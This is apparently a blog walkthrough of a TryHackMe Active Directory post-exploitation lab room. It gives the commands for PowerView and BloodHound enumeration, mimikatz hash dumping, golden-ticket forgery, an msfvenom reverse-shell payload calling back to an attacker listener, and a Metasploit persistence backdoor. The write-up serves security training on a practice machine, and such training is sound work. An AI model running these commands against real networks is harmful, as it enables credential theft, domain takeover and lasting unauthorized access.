Post-Exploitation Basics Writeup - Tryhackme

Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom

How this helps your pentesting career:

  • This room will be related to very real world applications
    • Enumerating with Windows Server Manager
  • How to approach a network after you have gained shell on a machine
    • Golden Ticket Attack
    • Maintaining Access

This room will cover all of the basics of post-exploitation; we’ll talk everything from post-exploitation enumeration with powerview and bloodhound, dumping hashes and golden ticket attacks with mimikatz, basic information gathering using windows server tools and logs, and then we will wrap up this room talking about the basics of maintaining access with the persistence metaploit module and creating a backdoor into the machine to get an instant meterpreter shell if the system is ever shutdown or reset.

This room will be related to very real world applications and will most likely not help with any ctfs however this room will give you great starting knowledge of how to approach a network after you have gained a shell on a machine.

#1 Deploy the Machine

To start this room you will need to rdp or ssh into the machine your credentials are – user:Administrator pass:P@$$W0rd domain:controller.local

Powerview is a powerful powershell script from powershell empire that can be used for enumerating a domain after you have already gained a shell in the system.

We’ll be focusing on how to start up and get users and groups from PowerView.

I have already taken the time and put PowerView on the machine

1.) Start Powershell – powershell -ep bypass -ep bypasses the execution policy of powershell allowing you to easily run scripts

2.) Start PowerView – . .\Downloads\PowerView.ps1

3.) Enumerate the domain users – Get-NetUser | select cn    

4.) Enumerate the domain groups – Get-NetGroup -GroupName *admin*    

 

Now enumerate the domain further on your own

Here’s a cheatsheet to help you with commands: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

Cheatsheet Credit: HarmJ0y

 

Questions

#1 What is the shared folder that is not set by default?

The hint said to use ‘Invoke-ShareFinder’ but from my research, that seems to be an old command that is now replaced by Find-DomainShare. 

  • After some research comparing the cheat sheets and the most recent powerview script, I’ve come to the conclusion that the script used on the target machine was a very early version of the PowerView v3 script.  This means the aliases have changed, and the commands used in this room are outdated (v2 vs v3 commands). powerview.ps1 confusion
  • For Example, the cheat sheet says ‘Find-DomainShare’ replaces the older ‘Invoke-ShareFinder’, but as show in the screenshot below, ‘Find-DomainShare’ doesn’t work and is not found in the local script at all. powerview.ps1 cheatsheet

PowerView.ps1 Invoke-ShareFinder command

powerview.ps1 Find-DomainShare not working
PowerView.ps1 v3 CheatSheet (https://h4ck.co/wp-content/uploads/2017/11/PowerView.pdf) says that Find-DomainShare replaced Invoke-ShareFInder so I think v2 of the script is on the target machine?


Answer: From the screenshots, we can see a \Share share that has no description.

 

#2 What operating system is running inside of the network besides Windows Server 2019?

The v3 command is Get-DomainComputer, but it doesn’t work for this local powerview script.  Instead, let’s use Get-NetComputer and specify -FullData.  There are three machines, each showing the info below: Get-NetComputer Command

To select only the operatingsystem lines:

Answer: Windows 10 Enterprise Evaluation

 

#3 I’ve hidden a flag inside of the users find it

Let’s enumerate the users with Get-NetUser command and select only the ‘givenname’ property:postexploit t2q3 flag

obfuscated t2q3 flag

Bloodhound is a graphical interface that allows you to visually map out the network. This tool along with SharpHound which similar to PowerView takes the user, groups, trusts etc. of the network and collects them into .json files to be used inside of Bloodhound.

Well be focusing on how to collect the .json files and how to import them into Bloodhound

I have already taken the time to put SharpHound onto the machine 

BloodHound Installation –

1.) apt-get install bloodhound    

2.) neo4j console – default credentials -> neo4j:neo4j

    • Once neo4j is running, access the browser application thru localhost:7474 neo4j browser

Getting loot w/ SharpHound –

1.) powershell -ep bypass same as with PowerView

2.) . .\Downloads\SharpHound.ps1    

3.) Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip    

Enumerate with SharpHound.ps1

4.) Transfer the loot.zip folder to your Attacker Machine

note: you can use scp to transfer the file if you’re using ssh scp transfer file from Windows to Kali

 

Mapping the network w/ BloodHound –

1.) bloodhound Run this on your attacker machine not the victim machine

2.) Sign In using the same credentials you set with Neo4j

3.) Inside of Bloodhound search for this icon  and import the loot.zip folder import loot.zip

note: On some versions of BloodHound the import button does not work to get around this simply drag and drop the loot.zip folder into Bloodhound to import the .json files

4.) To view the graphed network open the menu and select queries this will give you a list of pre-compiled queries to choose from.

The queries can be as simple as find all domain admins – find all domain admin query

 

Or as complicated as shortest path to high value targets –

There are plenty of queries to choose from and enumerate connections inside of the network

 

Questions

#1 What service is also a domain admin

Answer: From the ‘Find all Domain Admins’ Query from above, the SQLSERVICE account probably refers to a SQL service.


#2 What two users are Kerberoastable?

kerberoastable query

Answer: sqlservice, krbtgt

Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of a active directory network

We’ll be focusing on dumping the NTLM hashes with mimikatz and then cracking those hashes using hashcat

I have already taken the time to put mimikatz on the machine

Dump Hashes w/ mimikatz –

1.) cd Downloads && mimikatz.exe this will cd into the directory that mimikatz is kept as well as run the mimikatz binary

2.) privilege::debug ensure that the output is “Privilege ’20’ ok” – This ensures that you’re running mimikatz as an administrator; if you don’t run mimikatz as an administrator, mimikatz will not run properly

3.) lsadump::lsa /patch Dump those hashes!

mimikatz hash output

Crack those hashes w/ hashcat

1.) hashcat -m 1000 <hash> rockyou.txt    

Mimikatz has many uses along side being a great tool to dump hashes we will cover another one of those ways of using mimikatz in the next task by creating a golden ticket with mimikatz

 

Questions

#1 what is the Machine1 Password?

Answer: obfuscated cracked machine1 hash


#2 What is the Machine2 Hash?

Answer: obfuscated machine2 hash

Again using the same tool as the previous task; however, this time we’ll be using it to create a golden ticket.

We will first dump the hash and sid of the krbtgt user then create a golden ticket and use that golden ticket to open up a new command prompt allowing us to access any machine on the network.

I have already taken the time to put mimikatz on the machine.

Dump the krbtgt Hash –

1.) cd downloads && mimikatz.exe    

2.) privilege::debug ensure this outputs [privilege “20” ok]

3.) lsadump::lsa /inject /name:krbtgt This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket

info needed to make ticket

Take note of what is outlined in red you’ll need it to create the golden ticket

Create a Golden Ticket –

1.) kerberos::golden /user: /domain: /sid: /krbtgt: /id:    

golden ticket generated

Use the Golden Ticket to access other machine –

1.) misc::cmd – This will open a new command prompt with elevated privileges to all machines

2.) Access other Machines! – You will now have another command prompt with access to all other machines on the network

Unfortunately because tryhackme does not currently support networks you will be unable to access other machines however I encourage you to add other machines to this domain controller yourself and try out these attacks

 

Aside: I ssh’d into the machine, so the misc::cmd command didn’t work because it spawns another GUI terminal shell.  Would need to rdp to the machine in order to see the spawned shell.


Because servers are hardly ever logged on unless its for maintenance this gives you an easy way for enumeration only using the built in windows features such as the server manager. If you already have domain admin you have a lot of access to the server manager in order to change trusts, add or remove users, look at groups, this can be an entry point to find other users with other sensitive information on their machines or find other users on the domain network with access to other networks in order to pivot to another network and continue your testing.

The only way to access the server manager is to rdp into the server and access the server over an rdp connection

We’ll only be going over the basics such as looking at users, groups, and trusts however there are a lot of other mischief that you can get your hands on in terms of enumerating with the server manager

This can also be a way of easily identifying what kind of firewall the network is using if you have not already enumerated it.

Connect to the VM w/ rdp –

The credentials are – domain:controller.local user:Administrator password:P@$$W0rd

Enumeration w/ Server Manager –

This is what Windows Server Manager will look when you first open it up the main tabs that will be most interesting are the tools and manage tabs the tools tab is where you will find most of your information such as users, groups, trusts, computers. The manage tab will allow you to add roles and features however this will probably get picked up by a systems admin relatively quick.

Dont worry about the AD CS, AD DS, DNS, or File and Storage Services these are setup for exploitation of the active directory and dont have much use for post-exploitation

Windows Server Manager Dashboard
We will not worry about AD CS, AD DS, DNS, and File & Storage Services

Navigate to the tools tab and select the Active Directory Users and Computers

This will pull up a list of all users on the domain as well as some other useful tabs to use such as groups and computers

Some sys admins dont realize that you as an attacker can see the descriptions of user accounts so they may set the service accounts passwords inside of the description look into the description and find what the SQL Service password is


#1

What tool allows to view the event logs? Event Viewer Menu Event ViewerAnswer: Event Viewer

#2What is the SQL Service passwordObfuscated SQL Service user password

There are a quite a few ways to maintain access on a machine or network we will be covering a fairly simple way of maintaining access by first setting up a meterpreter shell and then using the persistence metasploit module allowing us to create a backdoor service in the system that will give us an instant meterpreter shell if the machine is ever shutdown or reset.

There are also other ways of maintaining access such as advanced backdoors and rootkits however those are out of scope for this room.

This will require a little more manual setup than the other tasks so it is recommended to have previous knowledge of msfvenom and metasploit.

 

Generating a Payload w/ msfvenom

1.) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe this will generate a basic windows meterpreter reverse tcp shell

creating payload with msfvenom

2.) Transfer the payload from your attacker machine to the target machine. transfer payload from kali server

Using powershell command to download payload from kali web server

3.) use exploit/multi/handler – this will create a listener on the port that you set it on.

4.) execute the binary this will give you a meterpreter shell back in metasploit – background your meterpreter session we won’t actually be using it for the shell.  meterpreter shell

 

Run the Persistence Module –

1.) use exploit/windows/local/persistence this module will send a payload every 10 seconds in default however you can set this time to anything you want

2.) set session 1 set the session to your background meterpreter session

persistence module

If the system is shut down or reset for whatever reason you will lose your meterpreter session however by using the persistence module you create a backdoor into the system which you can access at any time using the metasploit multi handler and setting the payload to windows/meterpreter/reverse_tcp allowing you to send another meterpreter payload to the machine and open up a new meterpreter session.

Here you can see the session die however the second we run the handler again we get a meterpreter shell back thanks to the persistence service.

There are other ways of maintaining access such as adding users and rootkits however I will leave you to do your own research and labs on those topics.


#1I understand how to install a backdoor on a system using the persistence module

Final Thoughts –

This room has given a good beginning with post-exploitation however there are a lot of other methods ever-evolving. I suggest to you to go out and do your own research find your own tools that you like to use for post-exploitation. I hope to make another room similar to this covering more advanced topics such as more in-depth backdoors and trojans, pivoting, token impersonation, and silver ticket attacks. I hope that this room has helped to give you a better understanding of how post-exploitation works in a real-world scenario.

Resources –

Tools/Malware Used –


#1

I understand the basics of post-exploitation

Leave a Reply